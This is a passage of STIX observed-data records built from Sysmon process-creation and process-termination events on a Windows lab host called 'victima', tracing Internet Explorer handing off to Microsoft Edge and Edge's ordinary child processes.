| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMTESTB", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T02:28:39.751Z", | |
| "last_observed": "2022-07-27T02:28:39.751Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--2561bed8-0f27-4185-9f9c-d65d1a2a7788", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.760Z", | |
| "modified": "2022-07-28T16:05:45.760Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e001-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:6492 CREDAT:9474 /prefetch:2" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 7072, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:23.343903094Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e001-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.355Z", | |
| "last_observed": "2022-07-27T14:26:14.355Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--637c21ec-d10b-4327-bb4e-79a8bbed779d", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.761Z", | |
| "modified": "2022-07-28T16:05:45.761Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 7072, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:26:23.345892473Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b06-62e1-e001-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.383Z", | |
| "last_observed": "2022-07-27T14:26:14.383Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--376ce692-a3f0-4d69-a6f6-52639558c389", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.762Z", | |
| "modified": "2022-07-28T16:05:45.762Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5260, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 8244, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:23.348393810Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.707Z", | |
| "last_observed": "2022-07-27T14:26:14.707Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4a3a88b6-9629-4810-9e7b-d19f97e6d6c2", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.762Z", | |
| "modified": "2022-07-28T16:05:45.762Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=crashpad-handler", | |
| "--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data", | |
| "/prefetch:7", | |
| "--monitor-self-annotation=ptype=crashpad-handler", | |
| "--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad", | |
| "--annotation=IsOfficialBuild=1", | |
| "--annotation=channel=", | |
| "--annotation=chromium-version=103.0.5060.114", | |
| "--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--annotation=plat=Win64", | |
| "--annotation=prod=Microsoft Edge", | |
| "--annotation=ver=103.0.1264.62", | |
| "--initial-client-data=0x108,0x10c,0x110,0xe4,0x1a4,0x7ffac1a5a0b8,0x7ffac1a5a0c8,0x7ffac1a5a0d8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\", | |
| "args_count": 14, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e301-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 8244, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 5736, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=103.0.5060.114 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 \"--annotation=prod=Microsoft Edge\" --annotation=ver=103.0.1264.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x1a4,0x7ffac1a5a0b8,0x7ffac1a5a0c8,0x7ffac1a5a0d8", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:23.350172184Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=crashpad-handler", | |
| "--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data", | |
| "/prefetch:7", | |
| "--monitor-self-annotation=ptype=crashpad-handler", | |
| "--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad", | |
| "--annotation=IsOfficialBuild=1", | |
| "--annotation=channel=", | |
| "--annotation=chromium-version=103.0.5060.114", | |
| "--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--annotation=plat=Win64", | |
| "--annotation=prod=Microsoft Edge", | |
| "--annotation=ver=103.0.1264.62", | |
| "--initial-client-data=0x108,0x10c,0x110,0xe4,0x1a4,0x7ffac1a5a0b8,0x7ffac1a5a0c8,0x7ffac1a5a0d8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\", | |
| "args_count": 14, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e301-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.963Z", | |
| "last_observed": "2022-07-27T14:26:14.963Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--100a68f3-875f-43aa-9476-42b8fa0246f3", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.763Z", | |
| "modified": "2022-07-28T16:05:45.763Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=gpu-process", | |
| "--gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA=", | |
| "--mojo-platform-channel-handle=2072", | |
| "--field-trial-handle=2180,i,15167668803209205671,16412517659772992776,131072", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b0a-62e1-e501-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 8244, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 8680, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 --field-trial-handle=2180,i,15167668803209205671,16412517659772992776,131072 /prefetch:2", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:26.433172405Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:20.086Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=gpu-process", | |
| "--gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA=", | |
| "--mojo-platform-channel-handle=2072", | |
| "--field-trial-handle=2180,i,15167668803209205671,16412517659772992776,131072", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b0a-62e1-e501-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:18.743Z", | |
| "last_observed": "2022-07-27T14:26:18.743Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--7e48370e-f350-4ca0-8af9-cd944cde3fb9", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.764Z", | |
| "modified": "2022-07-28T16:05:45.764Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=network.mojom.NetworkService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=none", | |
| "--mojo-platform-channel-handle=2156", | |
| "--field-trial-handle=2180,i,15167668803209205671,16412517659772992776,131072", | |
| "/prefetch:3" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4b0a-62e1-e701-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 8244, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 1384, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2180,i,15167668803209205671,16412517659772992776,131072 /prefetch:3", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:26.433977444Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:20.086Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
